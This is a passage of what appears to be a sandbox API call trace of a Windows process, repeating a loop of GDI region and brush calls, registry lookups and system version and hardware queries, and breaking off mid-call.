[0087.766] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.766] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.766] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5e0401d3 [0087.767] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5c0401d6 [0087.767] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b43 [0087.767] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b44 [0087.767] CombineRgn (hrgnDst=0x1040b43, hrgnSrc1=0x5e0401d3, hrgnSrc2=0x5c0401d6, iMode=1) returned 1 [0087.767] CombineRgn (hrgnDst=0x1040b44, hrgnSrc1=0x5e0401d3, hrgnSrc2=0x5c0401d6, iMode=4) returned 2 [0087.767] CreateSolidBrush (color=0xff) returned 0x2100b42 [0087.767] CreateSolidBrush (color=0xff0000) returned 0x1100b45 [0087.767] DeleteObject (ho=0x1100b45) returned 1 [0087.767] DeleteObject (ho=0x5c0401d6) returned 1 [0087.767] DeleteObject (ho=0x5e0401d3) returned 1 [0087.767] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.767] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.767] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.767] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.767] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.767] BeginPath (hdc=0x0) returned 0 [0087.767] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.767] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.767] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.767] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.767] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.767] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.767] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.767] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.767] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5d0401d6 [0087.767] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5f0401d3 [0087.767] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b46 [0087.767] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b47 [0087.767] CombineRgn (hrgnDst=0x1040b46, hrgnSrc1=0x5d0401d6, hrgnSrc2=0x5f0401d3, iMode=1) returned 1 [0087.767] CombineRgn (hrgnDst=0x1040b47, hrgnSrc1=0x5d0401d6, hrgnSrc2=0x5f0401d3, iMode=4) returned 2 [0087.767] CreateSolidBrush (color=0xff) returned 0x2100b45 [0087.767] CreateSolidBrush (color=0xff0000) returned 0x1100b48 [0087.767] DeleteObject (ho=0x1100b48) returned 1 [0087.767] DeleteObject (ho=0x5f0401d3) returned 1 [0087.767] DeleteObject (ho=0x5d0401d6) returned 1 [0087.767] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.767] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.767] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.767] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.767] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.767] BeginPath (hdc=0x0) returned 0 [0087.767] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.768] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.768] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.768] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.768] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.768] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.768] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.768] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.768] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x600401d3 [0087.768] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5e0401d6 [0087.768] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b49 [0087.768] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b4a [0087.768] CombineRgn (hrgnDst=0x1040b49, hrgnSrc1=0x600401d3, hrgnSrc2=0x5e0401d6, iMode=1) returned 1 [0087.768] CombineRgn (hrgnDst=0x1040b4a, hrgnSrc1=0x600401d3, hrgnSrc2=0x5e0401d6, iMode=4) returned 2 [0087.768] CreateSolidBrush (color=0xff) returned 0x2100b48 [0087.768] CreateSolidBrush (color=0xff0000) returned 0x1100b4b [0087.768] DeleteObject (ho=0x1100b4b) returned 1 [0087.768] DeleteObject (ho=0x5e0401d6) returned 1 [0087.768] DeleteObject (ho=0x600401d3) returned 1 [0087.768] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.768] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.768] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.768] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.768] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.768] BeginPath (hdc=0x0) returned 0 [0087.768] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.768] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.768] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.768] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.768] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.768] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.768] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.768] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.768] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5f0401d6 [0087.768] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x610401d3 [0087.768] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b4c [0087.768] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b4d [0087.768] CombineRgn (hrgnDst=0x1040b4c, hrgnSrc1=0x5f0401d6, hrgnSrc2=0x610401d3, iMode=1) returned 1 [0087.769] CombineRgn (hrgnDst=0x1040b4d, hrgnSrc1=0x5f0401d6, hrgnSrc2=0x610401d3, iMode=4) returned 2 [0087.769] CreateSolidBrush (color=0xff) returned 0x2100b4b [0087.769] CreateSolidBrush (color=0xff0000) returned 0x1100b4e [0087.769] DeleteObject (ho=0x1100b4e) returned 1 [0087.769] DeleteObject (ho=0x610401d3) returned 1 [0087.769] DeleteObject (ho=0x5f0401d6) returned 1 [0087.769] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.769] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.769] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.769] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.769] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.769] BeginPath (hdc=0x0) returned 0 [0087.769] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.769] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.769] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.769] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.769] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.769] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.769] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.769] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.769] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x620401d3 [0087.769] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x600401d6 [0087.769] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b4f [0087.769] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b50 [0087.769] CombineRgn (hrgnDst=0x1040b4f, hrgnSrc1=0x620401d3, hrgnSrc2=0x600401d6, iMode=1) returned 1 [0087.769] CombineRgn (hrgnDst=0x1040b50, hrgnSrc1=0x620401d3, hrgnSrc2=0x600401d6, iMode=4) returned 2 [0087.769] CreateSolidBrush (color=0xff) returned 0x2100b4e [0087.769] CreateSolidBrush (color=0xff0000) returned 0x1100b51 [0087.769] DeleteObject (ho=0x1100b51) returned 1 [0087.769] DeleteObject (ho=0x600401d6) returned 1 [0087.769] DeleteObject (ho=0x620401d3) returned 1 [0087.769] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.769] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.769] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.769] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.769] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.769] BeginPath (hdc=0x0) returned 0 [0087.769] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.769] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.769] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.769] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.769] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.769] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.770] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.770] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.770] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x610401d6 [0087.770] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x630401d3 [0087.770] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b52 [0087.770] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b53 [0087.770] CombineRgn (hrgnDst=0x1040b52, hrgnSrc1=0x610401d6, hrgnSrc2=0x630401d3, iMode=1) returned 1 [0087.770] CombineRgn (hrgnDst=0x1040b53, hrgnSrc1=0x610401d6, hrgnSrc2=0x630401d3, iMode=4) returned 2 [0087.770] CreateSolidBrush (color=0xff) returned 0x2100b51 [0087.770] CreateSolidBrush (color=0xff0000) returned 0x1100b54 [0087.770] DeleteObject (ho=0x1100b54) returned 1 [0087.770] DeleteObject (ho=0x630401d3) returned 1 [0087.770] DeleteObject (ho=0x610401d6) returned 1 [0087.770] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.770] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.770] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.770] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.770] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.770] BeginPath (hdc=0x0) returned 0 [0087.770] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.770] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.770] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.770] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.770] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.770] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.770] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.770] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.770] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x640401d3 [0087.770] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x620401d6 [0087.770] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b55 [0087.770] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b56 [0087.770] CombineRgn (hrgnDst=0x1040b55, hrgnSrc1=0x640401d3, hrgnSrc2=0x620401d6, iMode=1) returned 1 [0087.770] CombineRgn (hrgnDst=0x1040b56, hrgnSrc1=0x640401d3, hrgnSrc2=0x620401d6, iMode=4) returned 2 [0087.771] CreateSolidBrush (color=0xff) returned 0x2100b54 [0087.771] CreateSolidBrush (color=0xff0000) returned 0x1100b57 [0087.771] DeleteObject (ho=0x1100b57) returned 1 [0087.771] DeleteObject (ho=0x620401d6) returned 1 [0087.771] DeleteObject (ho=0x640401d3) returned 1 [0087.771] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.771] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.771] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.771] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.771] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.771] BeginPath (hdc=0x0) returned 0 [0087.771] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.771] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.771] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.771] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.771] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.771] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.771] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.771] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.771] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x630401d6 [0087.771] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x650401d3 [0087.771] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b58 [0087.771] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b59 [0087.771] CombineRgn (hrgnDst=0x1040b58, hrgnSrc1=0x630401d6, hrgnSrc2=0x650401d3, iMode=1) returned 1 [0087.771] CombineRgn (hrgnDst=0x1040b59, hrgnSrc1=0x630401d6, hrgnSrc2=0x650401d3, iMode=4) returned 2 [0087.771] CreateSolidBrush (color=0xff) returned 0x2100b57 [0087.771] CreateSolidBrush (color=0xff0000) returned 0x1100b5a [0087.771] DeleteObject (ho=0x1100b5a) returned 1 [0087.771] DeleteObject (ho=0x650401d3) returned 1 [0087.771] DeleteObject (ho=0x630401d6) returned 1 [0087.771] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.771] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.771] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.771] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.771] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.771] BeginPath (hdc=0x0) returned 0 [0087.771] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.771] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.771] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.771] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.772] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.772] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.772] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.772] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.772] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x660401d3 [0087.772] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x640401d6 [0087.772] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b5b [0087.772] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b5c [0087.772] CombineRgn (hrgnDst=0x1040b5b, hrgnSrc1=0x660401d3, hrgnSrc2=0x640401d6, iMode=1) returned 1 [0087.772] CombineRgn (hrgnDst=0x1040b5c, hrgnSrc1=0x660401d3, hrgnSrc2=0x640401d6, iMode=4) returned 2 [0087.772] CreateSolidBrush (color=0xff) returned 0x2100b5a [0087.772] CreateSolidBrush (color=0xff0000) returned 0x1100b5d [0087.772] DeleteObject (ho=0x1100b5d) returned 1 [0087.772] DeleteObject (ho=0x640401d6) returned 1 [0087.772] DeleteObject (ho=0x660401d3) returned 1 [0087.772] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.772] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.772] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.772] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.772] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.772] BeginPath (hdc=0x0) returned 0 [0087.772] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.772] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.772] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.772] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.772] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.772] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.772] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.772] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.772] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x650401d6 [0087.772] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x670401d3 [0087.772] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b5e [0087.772] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b5f [0087.772] CombineRgn (hrgnDst=0x1040b5e, hrgnSrc1=0x650401d6, hrgnSrc2=0x670401d3, iMode=1) returned 1 [0087.772] CombineRgn (hrgnDst=0x1040b5f, hrgnSrc1=0x650401d6, hrgnSrc2=0x670401d3, iMode=4) returned 2 [0087.772] CreateSolidBrush (color=0xff) returned 0x2100b5d [0087.772] CreateSolidBrush (color=0xff0000) returned 